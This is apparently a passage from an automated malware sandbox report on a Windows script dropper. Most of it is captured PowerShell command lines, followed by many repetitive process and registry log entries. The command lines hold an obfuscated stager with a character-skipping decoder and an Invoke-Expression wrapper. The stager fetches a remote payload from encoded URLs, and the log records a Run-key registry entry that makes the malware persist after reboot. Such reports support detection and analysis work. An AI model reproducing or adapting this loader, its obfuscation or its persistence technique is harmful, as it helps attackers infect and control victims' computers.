L$CotArHVgOXeRDiaTacAcoUnSP tEpEUnNS OP,sV iHes';$Noncandescent+=Hjemmemarkedernes 'No5 e.f 0St R(G WeriScn.odAuoRewTos K RgNAdTSl Sr1Oa0,e.Cr0Un;Go EpW eiKun,r6 D4Ty;Re ax o6Fi4 a; HrOxvAf: V1 r3Si1 H.De0Da) l .GTveGacStkOvoSt/Ma2Be0Re1Co0I.0 O1de0in1Ho ChF HiBhrGeeSkfIdo rxUn/Re1m,3Ib1lu. i0';$Engangsafgift=Hjemmemarkedernes '.aU.iS oeCrr l-PyADigUne NS.t';$Ammunitionsfabrikkens=Hjemmemarkedernes ' Th tCot Fp.tsdv:Sp/Pa/ wUtw.nwO .AdlExeMebInePen es.erEkaFreOluIam MeUd-KogStgHamS bUnhAk.Ind Se / StCoep mThpAnlSdaT tO.eSt/Hei.on ecRu_LycAfsJesSt/Fys op seMec ,iPlfLeiU.cMa/ReKslv uiUmdcorMoeG da.eP sMo. BpR c nz';$moistureproof=Hjemmemarkedernes ' B>';$Recirculated=Hjemmemarkedernes 'viiSkEKeX';$Anionics='Resbolig';$Arcuation='\raadede.Erg';auspiciums (Hjemmemarkedernes 'Un$M,g Ul mO.tbBiAJaL :GhlQyYU,OEfnUneAbtBlIFyaEo=Bo$UnE,vnAavSi: OAtiPSuPunD ta pTTrA A+bl$S aUnrSec,auGraStt CIFooAfn');auspiciums (Hjemmemarkedernes ' .$Sig rl,rOInBL a rlFo:BaR iiSanStN eI dEbe=Vi$ BA .m mAmUL n ,iItTG IMaoSpNSpS eFNoaEnbmerUfi kR KVaePrn TSBa.EnsMaP SLM IAnTTi(Wr$BiMpaoTaIMos rtBuUq REpEDyp mrS OTro dFLi)');auspiciums (Hjemmemarkedernes $Kartonets247);$Ammunitionsfabrikkens=$Rinnie[0];$Chaffer=(Hjemmemarkedernes 'gu$ovGBulMaOMiBIsaKrlMa: Tb Ko,urGaTSySAnk MAD F aF SE alFosS,e KSK mcoENots o OdSieKoR mnMoEAd= BnPrEY.WSt- COSuBSkjOvEDuCUntF HjSCoYK S QTNeEF MS .S $ fc .OL c Hk ,n Ce rY RfSuyB i eN og');auspiciums ($Chaffer);auspiciums (Hjemmemarkedernes 'h $,sBVioSerSttA s.ukB aTufPrf PeFrlNasAneTes dm jeGatUnoEgdBue r Kn ,e N.BeHZ,ehaaB dwieUdrPhsko[I $ ERennegPoaPanU.g,rs,eaWifGagS.iG fRntUd] a=p $ N.oo,anYac raR.nRedS e.tsMac LeFon .t');$Internes=Hjemmemarkedernes 'se$E BAfoPlrRat sNok aCefKofSce Sl.lsNoeAnsTem.ae,ntFaoRodSpeAnrO.nUnet .,mDMooSlwA.n lStoGaaOrd OFIni elAdeAt( n$CaAS mGom vuPsnT,iOrt SiP o OnL.sInfE a Fbpir.yiMak tkM eminGls a,Rh$MyO.ykInsT.e ojReeBa)';$Okseje=$Lyonetia;auspiciums (Hjemmemarkedernes '.a$Kog.eL oo ABBeAF,lUn: EU,tN kAFrdXeDVaUVecCoe.ga,sB,olAfe ,=,y(PaTK ETesLeTSt-PrpMeaUnT CH B Sl$ o UK esFrEP JUnEFn)');whilJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Boernehjaelpsdag='Flerbrugerudgaver';;$Anekdotiskes='Kvajer';;$Apathia='Gunbuilder';;$Meterologisk='Billioners174';;$Paracelsianism='Intervertebra';;$Claritude=$host.Name;function Ructation($Krselstiderne){If ($Claritude) {$Slutdatoerne=2} for ($Unglamorously=$Slutdatoerne;;$Unglamorously+=3){if(!$Krselstiderne[$Unglamorously]) { break }$Buckland+=$Krselstiderne[$Unglamorously]}$Buckland}function Fashioneringer($Marins){ .($Clodpoles) ($Marins)}$Paydays=Ructation ' ln eamtSp. yW BEreb C uL SiLeeDoNTrT';$Nedsivningsbekendtgrelsernes=Ructation 'FuMCroDazI iMelGolDeaSl/';$Kongeparrets=Ructation ' MTRilI.sr 1 f2';$Dorbugs28='An[ManP,e StBa. .sTmE RR ivTii c oERaP.ioC iF N UT.om Ac N,ea RGBeEAnrA ]Hy:Be:U.sKoENaC ouRaRMiiS T DYOmpStrA,o TReoPrCVeOHaLte=st$MoKBeoarnTiGRaE p .AKaRN RCrEdiTN.s';$Nedsivningsbekendtgrelsernes+=Ructation 'Bi5W .Re0Wi (PeWDiiManAnd okawMas S ,tN .TKa Fo1 U0 R.D,0 G;Py MaWHoiFin o6vr4.n;gr Krx .6Be4C.; arA vUn: S1Me3S 1 D.b 0W,) . uG ae LcDikInoBr/ u2.s0 .1Fu0 ,0 C1Gl0.a1Be VeFRii .rTreKaf.oo .x H/A 1Gn3 u1Pe.Ek0';$trevrelserslejligheds=Ructation 'O,U SB EbrRD -B,aSkGAfE Kn Ut';$Fishgrass=Ructation 'Gehs.tStt.ppSksEs:C /t,/ ,wSowDew r.HueAllQuePhk JtRerFro,rs eserU vPaiUnc HeVi-GanJ e uO rdyu DpD pQui n o.AkdE eFl/LnfBriFulR eHaa adRam RiPon.a/T wU o jl.rtBieBoreq/ ,O vDie arHop,ya Eir nF f CuT,lBo.T aUnfDem';$Korporal=Ructation 'Re>';$Clodpoles=Ructation 'UniD EguX';$Overgrnserne='Orthopterological';$Undladelsers='\Milieuplanerne.Chl';Fashioneringer (Ructation 'Fy$FrGElL FoNib iaRaL,t:FoUP nMovFoAhyl ISedP l ,yR,= S$R EA nK v :Ova P.apamdAmaMeTMoAba+ a$PhU anUpdy,lsua BDdieLdL sSKle kRUnS');Fashioneringer (Ructation '.r$EkgcaL ,oTeBPaa Dl U: aFMarAfE TMIdTUnvSku nN PGOveSnt u= m$ LfCuIlas Dh CgOvRHaASpSFoSAs. BsExP olcyIPoTop( u$LakIno RLePgno SrM.ABel I)');Fashioneringer (Ructation $Dorbugs28);$Fishgrass=$Fremtvunget[0];$Tilmeldtes=(Ructation 'Op$EcgInlA o eBB aOxLSt: ,GS.a iRSkAHymBlOR Nr,DTh= ON.rE rWB -V oBobByJ.rENoCFit PrsStYT sDiT uEEnmF,.Tr$AfpPaA aY GdG a sy s');Fashioneringer ($Tilmeldtes);Fashioneringer (Ructation 'Ep$PagFjaForLuaA.mOvo enP d O.ovHRieP aF dBoemor.esPe[ u$RetArr Le Tv vr.reRel is ,e ir .sStlAeeT j lSii gAnhTreStdB sDe]Pa=D $ NAmeEld.usB i.iv.unEfiE nMagC,sPrb meb,kAne rnS,d tUfg kr.oe Ll BsIneSlrK.nPre Ms');$Almugs=Ructation 'Sp$Nogska IrAraItm PoPen SdAm. aDCeo iwEpn Pl ao Na edB FDii ol.reMo(Yd$ FFP.iP,sPah g.or.aaSos WsLa,Im$ TSA.t naLnt,us b.ae Ms gAfe fnPre sS )';$Statsbesgenes=$Unvalidly;Fashioneringer (Ructation 'Ha$ GArLNeoBrB CaHaLTe:abIPrdBee ,aRelMeiSaZSpeSer.r= ,( STSteGes aTRe-TrpNaaT TKohAc S $ ,SAntInADgt SsRaBMoe CsMegBie RN de.fSEf)');while (!$Idealizer) {Fashioneringer (Ructation ' k$ SgNol PoAnb Sa dl.e: hA.upEntK,e.wrFeiOpn gFaeSkrYnnb eo s ,=,k$PlH oyChlReeStr.qn .esusVa5Pl4') ;Fashioneringer $Almugs;Fashioneringer (RuctatioJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06DB0F14 push ecx; iretd 3_2_06DB0F2A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06DB0DF4 push ecx; iretd 3_2_06DB0E02
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06DB2094 push edi; iretd 3_2_06DB20AA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06DB2190 push edi; iretd 3_2_06DB21AA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06DB1938 push edx; iretd 3_2_06DB1952
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_04B562A8 pushad ; ret 13_2_04B562C1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07826088 push esp; retf 13_2_0782609D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_091C32CB push E8F44D8Bh; retf 13_2_091C32D1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_09284322 push 8BD68B50h; iretd 13_2_09284341
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0928459A push 8BD38B50h; iretd 13_2_0928459F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_092847F9 push 8BD38B50h; iretd 13_2_092847FE
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AfskibningJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AfskibningJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
